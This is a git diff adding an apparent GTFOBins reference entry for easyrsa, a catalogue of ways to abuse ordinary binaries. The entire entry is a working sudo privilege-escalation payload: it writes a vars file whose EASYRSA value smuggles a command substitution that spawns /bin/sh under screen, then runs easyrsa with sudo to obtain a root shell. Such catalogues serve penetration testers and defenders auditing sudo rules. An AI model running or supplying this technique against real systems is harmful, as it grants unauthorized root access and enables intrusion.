diff --git a/_gtfobins/easyrsa.md b/_gtfobins/easyrsa.md new file mode 100644 index 0000000..401b130 --- /dev/null +++ b/_gtfobins/easyrsa.md @@ -0,0 +1,9 @@ +--- +functions: + sudo: + - description: The below technique utilizies `screen` to have a proper working interactive shell. + code: | + echo 'set_var EASYRSA "$(/usr/bin/screen /bin/sh)"' > /tmp/vars + sudo easyrsa --vars=/tmp/vars + export PATH=/bin:/usr/bin +---